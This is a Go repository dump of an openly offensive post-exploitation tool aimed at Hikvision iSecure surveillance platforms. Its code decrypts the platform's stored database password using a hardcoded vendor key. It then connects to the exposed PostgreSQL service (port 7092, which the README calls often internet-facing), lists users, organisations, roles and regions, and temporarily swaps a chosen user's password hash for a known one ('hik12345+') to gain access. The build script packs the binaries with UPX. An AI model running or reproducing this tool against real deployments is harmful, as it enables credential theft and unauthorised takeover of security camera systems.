├── .gitignore ├── README.md ├── build.sh ├── conf └── conf.go ├── go.mod ├── go.sum ├── img ├── 1.png └── 2.png ├── main.go ├── modules ├── ChangePWD.go ├── GetInfo.go └── Run.go └── utils ├── ColorPrint.go └── utils.go /.gitignore: -------------------------------------------------------------------------------- 1 | .idea -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 海康威视iSecure后渗透 2 | 3 | ## 简介 4 | 5 | *主要用于获取权限后通过数据库信息进行资产信息确认* 6 | 7 | ## 使用 8 | 9 | ------ 10 | **参数** 11 | 12 | ``` shell 13 | -P int 14 | database port. # 数据库端口 15 | -c change database password. # 密码修改 16 | -f string 17 | config file path. # 配置文件地址 18 | -h string 19 | database host name. # 数据库主机地址 20 | -p string 21 | database password. # 数据库密码(可直接粘贴密文) 22 | -u string 23 | database user name. # 数据库用户 24 | ``` 25 | 26 | **使用方法一** 27 | 28 | 上传对应可执行文件到目标服务器后使用-f参数指定配置文件使用。(默认配置文件 **/opt/hikvision/web/components/postgresql11linux64.1/conf/config.properties**) 29 | 30 | ![](img\1.png) 31 | 32 | **使用方法二** 33 | 34 | 手动设定账户密码主机等信息,因为部分海康系统的postgres端口(7092)会对外网开放,所以可以在获取密码密文后进行参数指定运行。 35 | 36 | ![](img\2.png) -------------------------------------------------------------------------------- /build.sh: -------------------------------------------------------------------------------- 1 | export LDFLAGS='-s -w ' 2 | 3 | CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o hik main.go 4 | CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o hik.exe main.go 5 | CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="$LDFLAGS" -trimpath -o hik_darwin_amd64 main.go 6 | CGO_ENABLED=0 GOOS=darwin GOARCH=arm64 go build -ldflags="$LDFLAGS" -trimpath -o hik_darwin_arm64 main.go 7 | 8 | upx -9 hik 9 | upx -9 hik.exe 10 | upx -9 hik_darwin_amd64 11 | upx -9 hik_darwin_arm64 -------------------------------------------------------------------------------- /conf/conf.go: -------------------------------------------------------------------------------- 1 | package conf 2 | 3 | import ( 4 | "DBTools/utils" 5 | "database/sql" 6 | "fmt" 7 | "github.com/jmoiron/sqlx" 8 | _ "github.com/lib/pq" 9 | "github.com/magiconair/properties" 10 | "os" 11 | "reflect" 12 | ) 13 | 14 | var ( 15 | DbS DbConf 16 | ) 17 | 18 | type DbConf struct { 19 | ConfigFile string 20 | Username string 21 | Password string 22 | Hostname string 23 | Port int 24 | Version string 25 | IsDBA bool 26 | ChangePWD bool 27 | Db *sqlx.DB 28 | DataBase string 29 | } 30 | 31 | func (D *DbConf) CreateConnection() error { 32 | if exists, err := D.dataBaseExists("irds_irdsdb"); err == nil && exists { 33 | D.DataBase = "irds_irdsdb" 34 | } else if exists, err := D.dataBaseExists("isupm_upmdb"); err == nil && exists { 35 | D.DataBase = "isupm_upmdb" 36 | } else { 37 | fmt.Println(utils.ColorPrint(-1, "Not Support")) 38 | os.Exit(0) 39 | } 40 | connectionString := fmt.Sprintf("postgres://%s:%s@%s:%d/%s?sslmode=disable", D.Username, D.Password, D.Hostname, D.Port, D.DataBase) 41 | db, err := sqlx.Open("postgres", connectionString) 42 | if err != nil { 43 | return err 44 | } 45 | if err = db.Ping(); err != nil { 46 | return err 47 | } 48 | D.Db = db 49 | D.GetVersion() 50 | D.IsDba() 51 | D.ShowDbDetail() 52 | return nil 53 | } 54 | func (D *DbConf) dataBaseExists(dbName string) (bool, error) { 55 | dsn := fmt.Sprintf("postgres://%s:%s@%s:%d/?sslmode=disable", D.Username, D.Password, D.Hostname, D.Port) 56 | db, err := sql.Open("postgres", dsn) 57 | defer db.Close() 58 | if err != nil { 59 | return false, err 60 | } 61 | var exists bool 62 | err = db.QueryRow("SELECT EXISTS(SELECT 1 FROM pg_database WHERE datname = $1)", dbName).Scan(&exists) 63 | if err != nil { 64 | return false, err 65 | } 66 | return exists, nil 67 | } 68 | func (D *DbConf) GetVersion() { 69 | Version := "" 70 | err := D.Db.QueryRow("SELECT version()").Scan(&Version) 71 | if err != nil { 72 | return 73 | } 74 | D.Version = Version 75 | } 76 | func (D *DbConf) IsDba() { 77 | Dba := false 78 | isDba := "" 79 | err := D.Db.QueryRow("SHOW is_superuser").Scan(&isDba) 80 | if err != nil { 81 | fmt.Println(utils.ColorPrint(-1, "Check DBA Failed")) 82 | return 83 | } 84 | if isDba == "on" { 85 | Dba = true 86 | } 87 | D.IsDBA = Dba 88 | } 89 | func (D DbConf) ShowDbDetail() { 90 | var typeInfo = reflect.TypeOf(D) 91 | var valInfo = reflect.ValueOf(D) 92 | num := typeInfo.NumField() 93 | for i := 0; i < num; i++ { 94 | key := typeInfo.Field(i).Name 95 | val := valInfo.Field(i).Interface() 96 | if key == "Db" { 97 | continue 98 | } 99 | fmt.Println(utils.ColorPrint(0, fmt.Sprintf("%v ==> %v", key, val))) 100 | } 101 | } 102 | func (D *DbConf) ParseConfigFile() { 103 | p := properties.MustLoadFile(D.ConfigFile, properties.UTF8) 104 | 105 | // 获取单个属性值 106 | port := p.GetInt("rdbms.1.port", 7092) 107 | password, exist := p.Get("rdbms.1.password") 108 | if exist { 109 | D.Password, _ = utils.DecryptData(password) 110 | } 111 | username := p.GetString("rdbms.1.username", "postgres") 112 | hostname := p.GetString("rdbms.1.@ip", "127.0.0.1") 113 | D.Username = username 114 | D.Port = port 115 | D.Hostname = hostname 116 | } 117 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module DBTools 2 | 3 | go 1.20 4 | 5 | require ( 6 | github.com/fatih/color v1.16.0 7 | github.com/jmoiron/sqlx v1.4.0 8 | github.com/lib/pq v1.10.9 9 | github.com/magiconair/properties v1.8.7 10 | golang.org/x/crypto v0.24.0 11 | ) 12 | 13 | require ( 14 | github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 // indirect 15 | github.com/go-openapi/errors v0.22.0 // indirect 16 | github.com/go-openapi/strfmt v0.23.0 // indirect 17 | github.com/google/uuid v1.6.0 // indirect 18 | github.com/jedib0t/go-pretty v4.3.0+incompatible // indirect 19 | github.com/mattn/go-colorable v0.1.13 // indirect 20 | github.com/mattn/go-isatty v0.0.20 // indirect 21 | github.com/mattn/go-runewidth v0.0.15 // indirect 22 | github.com/mitchellh/mapstructure v1.5.0 // indirect 23 | github.com/oklog/ulid v1.3.1 // indirect 24 | github.com/rivo/uniseg v0.2.0 // indirect 25 | go.mongodb.org/mongo-driver v1.14.0 // indirect 26 | golang.org/x/sys v0.21.0 // indirect 27 | ) 28 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | filippo.io/edwards25519 v1.1.0 h1:FNf4tywRC1HmFuKW5xopWpigGjJKiJSV0Cqo0cJWDaA= 2 | filippo.io/edwards25519 v1.1.0/go.mod h1:BxyFTGdWcka3PhytdK4V28tE5sGfRvvvRV7EaN4VDT4= 3 | github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2 h1:DklsrG3dyBCFEj5IhUbnKptjxatkF07cF2ak3yi77so= 4 | github.com/asaskevich/govalidator v0.0.0-20230301143203-a9d515a09cc2/go.mod h1:WaHUgvxTVq04UNunO+XhnAqY/wQc+bxr74GqbsZ/Jqw= 5 | github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM= 6 | github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE= 7 | github.com/go-openapi/errors v0.22.0 h1:c4xY/OLxUBSTiepAg3j/MHuAv5mJhnf53LLMWFB+u/w= 8 | github.com/go-openapi/errors v0.22.0/go.mod h1:J3DmZScxCDufmIMsdOuDHxJbdOGC0xtUynjIx092vXE= 9 | github.com/go-openapi/strfmt v0.23.0 h1:nlUS6BCqcnAk0pyhi9Y+kdDVZdZMHfEKQiS4HaMgO/c= 10 | github.com/go-openapi/strfmt v0.23.0/go.mod h1:NrtIpfKtWIygRkKVsxh7XQMDQW5HKQl6S5ik2elW+K4= 11 | github.com/go-sql-driver/mysql v1.8.1 h1:LedoTUt/eveggdHS9qUFC1EFSa8bU2+1pZjSRpvNJ1Y= 12 | github.com/go-sql-driver/mysql v1.8.1/go.mod h1:wEBSXgmK//2ZFJyE+qWnIsVGmvmEKlqwuVSjsCm7DZg= 13 | github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= 14 | github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= 15 | github.com/jedib0t/go-pretty v4.3.0+incompatible h1:CGs8AVhEKg/n9YbUenWmNStRW2PHJzaeDodcfvRAbIo= 16 | github.com/jedib0t/go-pretty v4.3.0+incompatible/go.mod h1:XemHduiw8R651AF9Pt4FwCTKeG3oo7hrHJAoznj9nag= 17 | github.com/jmoiron/sqlx v1.4.0 h1:1PLqN7S1UYp5t4SrVVnt4nUVNemrDAtxlulVe+Qgm3o= 18 | github.com/jmoiron/sqlx v1.4.0/go.mod h1:ZrZ7UsYB/weZdl2Bxg6jCRO9c3YHl8r3ahlKmRT4JLY= 19 | github.com/lib/pq v1.10.9 h1:YXG7RB+JIjhP29X+OtkiDnYaXQwpS4JEWq7dtCCRUEw= 20 | github.com/lib/pq v1.10.9/go.mod h1:AlVN5x4E4T544tWzH6hKfbfQvm3HdbOxrmggDNAPY9o= 21 | github.com/magiconair/properties v1.8.7 h1:IeQXZAiQcpL9mgcAe1Nu6cX9LLw6ExEHKjN0VQdvPDY= 22 | github.com/magiconair/properties v1.8.7/go.mod h1:Dhd985XPs7jluiymwWYZ0G4Z61jb3vdS329zhj2hYo0= 23 | github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA= 24 | github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg= 25 | github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM= 26 | github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= 27 | github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= 28 | github.com/mattn/go-runewidth v0.0.15 h1:UNAjwbU9l54TA3KzvqLGxwWjHmMgBUVhBiTjelZgg3U= 29 | github.com/mattn/go-runewidth v0.0.15/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w= 30 | github.com/mattn/go-sqlite3 v1.14.22 h1:2gZY6PC6kBnID23Tichd1K+Z0oS6nE/XwU+Vz/5o4kU= 31 | github.com/mattn/go-sqlite3 v1.14.22/go.mod h1:Uh1q+B4BYcTPb+yiD3kU8Ct7aC0hY9fxUwlHK0RXw+Y= 32 | github.com/mitchellh/mapstructure v1.5.0 h1:jeMsZIYE/09sWLaz43PL7Gy6RuMjD2eJVyuac5Z2hdY= 33 | github.com/mitchellh/mapstructure v1.5.0/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= 34 | github.com/oklog/ulid v1.3.1 h1:EGfNDEx6MqHz8B3uNV6QAib1UR2Lm97sHi3ocA6ESJ4= 35 | github.com/oklog/ulid v1.3.1/go.mod h1:CirwcVhetQ6Lv90oh/F+FBtV6XMibvdAFo93nm5qn4U= 36 | github.com/rivo/uniseg v0.2.0 h1:S1pD9weZBuJdFmowNwbpi7BJ8TNftyUImj/0WQi72jY= 37 | github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= 38 | go.mongodb.org/mongo-driver v1.14.0 h1:P98w8egYRjYe3XDjxhYJagTokP/H6HzlsnojRgZRd80= 39 | go.mongodb.org/mongo-driver v1.14.0/go.mod h1:Vzb0Mk/pa7e6cWw85R4F/endUC3u0U9jGcNU603k65c= 40 | golang.org/x/crypto v0.24.0 h1:mnl8DM0o513X8fdIkmyFE/5hTYxbwYOjDS/+rK6qpRI= 41 | golang.org/x/crypto v0.24.0/go.mod h1:Z1PMYSOR5nyMcyAVAIQSKCDwalqy85Aqn1x3Ws4L5DM= 42 | golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 43 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 44 | golang.org/x/sys v0.21.0 h1:rF+pYz3DAGSQAxAu1CbC7catZg4ebC4UIeIhKxBZvws= 45 | golang.org/x/sys v0.21.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA= 46 | -------------------------------------------------------------------------------- /img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adeljck/HikInfoGet/30239051c95365a028e0f0a9251a77f2a3ae33b5/img/1.png -------------------------------------------------------------------------------- /img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/adeljck/HikInfoGet/30239051c95365a028e0f0a9251a77f2a3ae33b5/img/2.png -------------------------------------------------------------------------------- /main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "DBTools/modules" 5 | ) 6 | 7 | func main() { 8 | modules.Run() 9 | } 10 | -------------------------------------------------------------------------------- /modules/ChangePWD.go: -------------------------------------------------------------------------------- 1 | package modules 2 | 3 | import ( 4 | "DBTools/conf" 5 | "fmt" 6 | "log" 7 | "time" 8 | ) 9 | 10 | func ChangePassword(user string) { 11 | rows, err := conf.DbS.Db.Query(fmt.Sprintf("SELECT user_pwd,salt,pwd_expire_time FROM irds_irdsdb.public.tb_user where user_name = '%s';", user)) 12 | if err != nil { 13 | log.Fatal(err) 14 | } 15 | defer rows.Close() 16 | origin_user_pwd := "" 17 | origin_salt := "" 18 | origin_pwd_expire_time := "" 19 | exchage_user_pwd := "57b303e3875c0e6834e388912a36215e044872f45b0d5bc01ef9eb47267a8292" 20 | exchange_expire_time := time.Now().AddDate(0, 0, 7) 21 | exchage_salt := "8e8c4210822e51efc34904279f8d716ce9a6c3f76f76d58690898eb08533ea76" 22 | for rows.Next() { 23 | err = rows.Scan(&origin_user_pwd, &origin_salt, &origin_pwd_expire_time) 24 | } 25 | fmt.Println(origin_user_pwd) 26 | fmt.Println(origin_salt) 27 | fmt.Println(origin_pwd_expire_time) 28 | query := ` 29 | UPDATE irds_irdsdb.public.tb_user 30 | SET 31 | user_pwd = $1, 32 | salt = $2, 33 | pwd_expire_time = $3 34 | WHERE 35 | user_name = $4 36 | ` 37 | _, err = conf.DbS.Db.Exec(query, exchage_user_pwd, exchage_salt, exchange_expire_time, user) 38 | if err != nil { 39 | log.Fatal(err) 40 | } 41 | fmt.Printf("Exchange Success\nUser %s's Password Change To hik12345+\n", user) 42 | fmt.Printf("End?") 43 | fmt.Scanf("\n") 44 | _, err = conf.DbS.Db.Exec(query, origin_user_pwd, origin_salt, origin_pwd_expire_time, user) 45 | if err != nil { 46 | log.Fatal(err) 47 | } 48 | fmt.Println("User Info Restore.") 49 | } 50 | -------------------------------------------------------------------------------- /modules/GetInfo.go: -------------------------------------------------------------------------------- 1 | package modules 2 | 3 | import ( 4 | "DBTools/conf" 5 | "DBTools/utils" 6 | "fmt" 7 | "github.com/jedib0t/go-pretty/table" 8 | "log" 9 | "os" 10 | ) 11 | 12 | var users = make([]string, 0) 13 | 14 | func InfoGet() { 15 | fmt.Println(utils.ColorPrint(1, "******************User Info******************")) 16 | queryUser() 17 | if conf.DbS.DataBase == "irds_irdsdb" { 18 | fmt.Println(utils.ColorPrint(1, "******************Org Info******************")) 19 | quertOrg() 20 | } 21 | fmt.Println(utils.ColorPrint(1, "******************Role Info******************")) 22 | quertRole() 23 | fmt.Println(utils.ColorPrint(1, "******************Region Info******************")) 24 | quertRegion() 25 | } 26 | func queryUser() { 27 | query := fmt.Sprintf("select user_name,usergroup_name from %s.public.tb_user;", conf.DbS.DataBase) 28 | rows, err := conf.DbS.Db.Query(query) 29 | if err != nil { 30 | log.Fatal(err) 31 | } 32 | defer rows.Close() 33 | t := table.NewWriter() 34 | t.SetOutputMirror(os.Stdout) 35 | t.AppendHeader(table.Row{"USER_NAME", "USER_GROUP_NAME"}) 36 | for rows.Next() { 37 | var username string 38 | var user_group_name string 39 | err = rows.Scan(&username, &user_group_name) 40 | users = append(users, username) 41 | if err != nil { 42 | log.Fatal(err) 43 | } 44 | t.AppendRow(table.Row{username, user_group_name}) 45 | } 46 | err = rows.Err() 47 | if err != nil { 48 | log.Fatal(err) 49 | } 50 | t.Render() 51 | } 52 | func quertOrg() { 53 | query := fmt.Sprintf("select org_id,org_name,org_index_code from %s.public.tb_org;", conf.DbS.DataBase) 54 | rows, err := conf.DbS.Db.Query(query) 55 | if err != nil { 56 | log.Fatal(err) 57 | } 58 | defer rows.Close() 59 | t := table.NewWriter() 60 | t.SetOutputMirror(os.Stdout) 61 | t.AppendHeader(table.Row{"ORG_ID", "ORG_NAME", "ORG_INDEX_CODE"}) 62 | // 遍历查询结果 63 | for rows.Next() { 64 | var org_id int 65 | var org_name string 66 | var org_index_code string 67 | err = rows.Scan(&org_id, &org_name, &org_index_code) 68 | if err != nil { 69 | log.Fatal(err) 70 | } 71 | t.AppendRow(table.Row{org_id, org_name, org_index_code}) 72 | } 73 | err = rows.Err() 74 | if err != nil { 75 | log.Fatal(err) 76 | } 77 | t.Render() 78 | } 79 | func quertRegion() { 80 | query := fmt.Sprintf("select region_name from %s.public.tb_region;", conf.DbS.DataBase) 81 | rows, err := conf.DbS.Db.Query(query) 82 | if err != nil { 83 | log.Fatal(err) 84 | } 85 | defer rows.Close() 86 | t := table.NewWriter() 87 | t.SetOutputMirror(os.Stdout) 88 | t.AppendHeader(table.Row{"REGION_NAME"}) 89 | // 遍历查询结果 90 | for rows.Next() { 91 | var region_name string 92 | err = rows.Scan(®ion_name) 93 | if err != nil { 94 | log.Fatal(err) 95 | } 96 | t.AppendRow(table.Row{region_name}) 97 | } 98 | err = rows.Err() 99 | if err != nil { 100 | log.Fatal(err) 101 | } 102 | t.Render() 103 | } 104 | func quertRole() { 105 | query := fmt.Sprintf("select role_name,creator from %s.public.tb_role;", conf.DbS.DataBase) 106 | rows, err := conf.DbS.Db.Query(query) 107 | if err != nil { 108 | log.Fatal(err) 109 | } 110 | defer rows.Close() 111 | t := table.NewWriter() 112 | t.SetOutputMirror(os.Stdout) 113 | t.AppendHeader(table.Row{"ROLE_NAME", "CREATOR"}) 114 | // 遍历查询结果 115 | for rows.Next() { 116 | var role_name string 117 | var creator string 118 | err = rows.Scan(&role_name, &creator) 119 | if err != nil { 120 | log.Fatal(err) 121 | } 122 | t.AppendRow(table.Row{role_name, creator}) 123 | } 124 | err = rows.Err() 125 | if err != nil { 126 | log.Fatal(err) 127 | } 128 | t.Render() 129 | } 130 | -------------------------------------------------------------------------------- /modules/Run.go: -------------------------------------------------------------------------------- 1 | package modules 2 | 3 | import ( 4 | "DBTools/conf" 5 | "DBTools/utils" 6 | "flag" 7 | "fmt" 8 | "os" 9 | ) 10 | 11 | func Run() { 12 | flag.StringVar(&conf.DbS.ConfigFile, "f", "", "config file path.") 13 | flag.StringVar(&conf.DbS.Hostname, "h", "", "database host name.") 14 | flag.IntVar(&conf.DbS.Port, "P", 0, "database port.") 15 | flag.StringVar(&conf.DbS.Username, "u", "", "database user name.") 16 | flag.BoolVar(&conf.DbS.ChangePWD, "c", false, "change database password.") 17 | flag.StringVar(&conf.DbS.Password, "p", "", "database password.") 18 | flag.Parse() 19 | if conf.DbS.ConfigFile != "" { 20 | conf.DbS.ParseConfigFile() 21 | } else { 22 | if conf.DbS.Hostname == "" { 23 | fmt.Println(utils.ColorPrint(-1, "Wrong HostName.")) 24 | return 25 | } 26 | if conf.DbS.Port <= 0 || conf.DbS.Port > 65535 { 27 | fmt.Println(utils.ColorPrint(-1, "Wrong Database Port.")) 28 | return 29 | } 30 | if conf.DbS.Username == "" { 31 | fmt.Println(utils.ColorPrint(-1, "Wrong UserName.")) 32 | return 33 | } 34 | if password, err := utils.DecryptData(conf.DbS.Password); err == nil { 35 | conf.DbS.Password = password 36 | } 37 | } 38 | err := conf.DbS.CreateConnection() 39 | if err != nil { 40 | fmt.Println(utils.ColorPrint(-1, "Connection Error.")) 41 | return 42 | } 43 | fmt.Println(utils.ColorPrint(0, "Connect To DataBase Success.")) 44 | 45 | InfoGet() 46 | if conf.DbS.ChangePWD && conf.DbS.DataBase == "irds_irdsdb" { 47 | for index, user := range users { 48 | fmt.Printf("%d:%s\n", index, user) 49 | } 50 | index := -1 51 | fmt.Printf("user index you want change:") 52 | fmt.Scanf("%d\n", &index) 53 | ChangePassword(users[index]) 54 | } else { 55 | fmt.Println(utils.ColorPrint(-1, "Change PWD Not Support This Version.")) 56 | os.Exit(0) 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /utils/ColorPrint.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import "github.com/fatih/color" 4 | 5 | func ColorPrint(c int, format string, a ...interface{}) string { 6 | switch c { 7 | case -1: 8 | return color.HiRedString("[-] "+format, a...) 9 | case 0: 10 | return color.HiGreenString("[+] "+format, a...) 11 | case 1: 12 | 13 | return color.HiBlueString(format, a...) 14 | default: 15 | 16 | return color.HiWhiteString("[+] "+format, a...) 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /utils/utils.go: -------------------------------------------------------------------------------- 1 | package utils 2 | 3 | import ( 4 | "crypto/aes" 5 | "crypto/cipher" 6 | "crypto/sha256" 7 | "encoding/base64" 8 | "fmt" 9 | "golang.org/x/crypto/pbkdf2" 10 | ) 11 | 12 | func DecryptData(base string) (string, error) { 13 | decode, err := base64.StdEncoding.DecodeString(base) 14 | if err != nil { 15 | return "", err 16 | } 17 | 18 | // Check magic number 19 | if decode[0] != 17 { 20 | return "", fmt.Errorf("Invalid magic number") 21 | } 22 | 23 | // Extract size and salt 24 | size := int(decode[1])<<8 | int(decode[2]) 25 | salt := decode[4 : 4+size] 26 | 27 | // Extract IV and data 28 | iv := decode[20 : 20+16] 29 | data := decode[36 : 36+size] 30 | 31 | // Derive AES key from password and salt using PBKDF2 32 | key := pbkdf2.Key([]byte("Abc123@&$++Hik45"), salt, 10000, 32, sha256.New) 33 | 34 | // Create AES cipher in CBC mode with PKCS5Padding 35 | block, err := aes.NewCipher(key) 36 | if err != nil { 37 | return "", err 38 | } 39 | 40 | mode := cipher.NewCBCDecrypter(block, iv) 41 | 42 | // Decrypt data 43 | mode.CryptBlocks(data, data) 44 | 45 | // Remove padding 46 | unpad := func(src []byte) []byte { 47 | length := len(src) 48 | unpadding := int(src[length-1]) 49 | return src[:(length - unpadding)] 50 | } 51 | 52 | decryptedData := unpad(data) 53 | 54 | // Convert decrypted data to UTF-8 string 55 | return string(decryptedData), nil 56 | } 57 | --------------------------------------------------------------------------------